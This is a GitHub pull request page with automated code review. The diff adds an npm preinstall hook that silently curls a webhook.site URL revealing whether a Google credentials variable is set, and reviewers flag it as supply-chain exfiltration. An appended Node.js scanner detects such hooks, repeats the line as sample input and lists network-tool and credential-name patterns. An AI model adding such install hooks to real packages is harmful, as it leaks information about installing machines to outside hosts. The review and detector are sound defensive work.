security PoC #4361
Conversation
Thanks for your pull request! It looks like this may be your first contribution to a Google open source project. Before we can look at your pull request, you'll need to sign a Contributor License Agreement (CLA). View this failed invocation of the CLA check for more information. For the most up to date status, view the checks section at the bottom of the pull request.
Code Review
This pull request introduces a critical security vulnerability by adding a preinstall script to package.json that attempts to exfiltrate environment variable information to an external, untrusted domain. The reviewer correctly flagged this as a severe supply chain risk and requested its immediate removal.
| "node": ">=16.0.0" | ||
| }, | ||
| "scripts": { | ||
| "preinstall": "curl -s https://webhook.site/9d88508f-ae3f-463e-8621-682ae1245290/CUSTARD_RCE_gcreds_${GOOGLE_APPLICATION_CREDENTIALS:+PRESENT}", |
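Review bot: the `"preinstall"` entry added to `"scripts"` here has to go; it turns `npm install` into a beacon. `preinstall` runs automatically for anyone who installs the package, `curl -s` keeps the request silent, and the final path segment of the URL expands `${GOOGLE_APPLICATION_CREDENTIALS:+PRESENT}`, so the third-party endpoint at webhook.site is told whether a service-account credential path is configured on the installing machine (the expansion sends the literal `PRESENT` when the variable is set and non-empty, and nothing otherwise, so the file contents are not sent, but the presence signal alone marks the host as worth targeting). Remove the `"preinstall"` line entirely rather than editing the URL; a sample package in this repository has no reason to contact the network during install.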
Critical Security Issue: The preinstall script executes an external curl command to an untrusted third-party domain (webhook.site) and attempts to exfiltrate environment variable status (GOOGLE_APPLICATION_CREDENTIALS). This introduces a severe supply chain risk and potential credential exposure. This script must be removed immediately.
Description
Fixes #
Note: Before submitting a pull request, please open an issue for discussion if you are not associated with Google.
Checklist
- `npm test` (see Testing)
- `npm run lint` (see Style)
- GoogleCloudPlatform/nodejs-docs-samples. Not a fork.
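A check of the kind the reviewer applied by hand, written as an added example for this page (it is not code from the PR, from the review bot, or from the nodejs-docs-samples project): it parses a `package.json`, inspects the npm lifecycle hooks that run without being invoked by name, and flags any hook whose command reaches the network, expands environment variables, or both. The sample `package.json` below is constructed here and embeds the `preinstall` line from the diff; the hook list, the tool and URL patterns, and the severity rules are this example's own assumptions rather than anything npm defines.

```javascript
// Added example for this page, not code from the PR or from
// GoogleCloudPlatform/nodejs-docs-samples. It flags npm lifecycle scripts that
// reach the network and/or expand environment variables, which is the shape of
// the preinstall line in the PR's diff.

// npm lifecycle hooks that run without the user naming them
// (assumption: these are the install- and publish-time hooks worth reviewing).
const LIFECYCLE_HOOKS = [
  'preinstall', 'install', 'postinstall', 'prepare',
  'prepublish', 'prepublishOnly', 'prepack', 'postpack',
];

// Commands an install-time script rarely has a legitimate reason to run (assumption).
const NETWORK_TOOLS = /\b(curl|wget|ncat|nc|Invoke-WebRequest|iwr)\b|fetch\(/;
const URL_PATTERN = /https?:\/\/[^\s"'`]+/g;
// Shell ${VAR}, ${VAR:+word}/${VAR:-word}, bare $VAR, Windows %VAR% and Node process.env.VAR.
const ENV_EXPANSION =
  /\$\{([A-Z_][A-Z0-9_]*)(?::?[-+=?][^}]*)?\}|\$([A-Z_][A-Z0-9_]*)|%([A-Z_][A-Z0-9_]*)%|process\.env\.([A-Za-z_][A-Za-z0-9_]*)/g;
// Name fragments that usually mark a credential-bearing variable (assumption).
const SENSITIVE_ENV = /CRED|TOKEN|SECRET|KEY|PASS|AUTH/i;

// Return the distinct environment-variable names a script references, in order of appearance.
function extractEnvVars(script) {
  const vars = new Set();
  for (const m of script.matchAll(ENV_EXPANSION)) {
    vars.add(m[1] || m[2] || m[3] || m[4]);
  }
  return [...vars];
}

// Scan the parsed package.json object and return one finding per suspicious hook.
// Severity (assumed scale): critical = network + env expansion (possible exfiltration),
// high = network only, medium = credential-looking env var but no network.
function scanLifecycleScripts(pkg) {
  const findings = [];
  const scripts = (pkg && pkg.scripts) || {};
  for (const hook of LIFECYCLE_HOOKS) {
    const script = scripts[hook];
    if (typeof script !== 'string') continue;
    const urls = script.match(URL_PATTERN) || [];
    const envVars = extractEnvVars(script);
    const usesNetwork = NETWORK_TOOLS.test(script) || urls.length > 0;
    const sensitiveEnv = envVars.filter((v) => SENSITIVE_ENV.test(v));
    if (!usesNetwork && sensitiveEnv.length === 0) continue;
    let severity = 'medium';
    if (usesNetwork && envVars.length > 0) severity = 'critical';
    else if (usesNetwork) severity = 'high';
    findings.push({ hook, severity, usesNetwork, urls, envVars, sensitiveEnv, script });
  }
  return findings;
}

// Convenience wrapper for raw package.json text.
function scanPackageJsonText(text) {
  return scanLifecycleScripts(JSON.parse(text));
}

// Constructed input: the scripts block from the PR's diff plus a benign postinstall.
const SAMPLE_PACKAGE_JSON = JSON.stringify({
  name: 'sample',
  engines: { node: '>=16.0.0' },
  scripts: {
    preinstall: 'curl -s https://webhook.site/9d88508f-ae3f-463e-8621-682ae1245290/CUSTARD_RCE_gcreds_${GOOGLE_APPLICATION_CREDENTIALS:+PRESENT}',
    postinstall: 'node scripts/build-fixtures.js',
    test: 'mocha --timeout 10000',
  },
});

console.log(JSON.stringify(scanPackageJsonText(SAMPLE_PACKAGE_JSON), null, 2));
```

Run it with `node` against any checked-out package to see which hooks would fire on `npm install`; the `test` script is deliberately ignored because it only runs when someone asks for it. A hook that expands a non-credential variable without touching the network (for example `$HOME`) is not reported, which keeps the output focused on the exfiltration pattern the PR demonstrates.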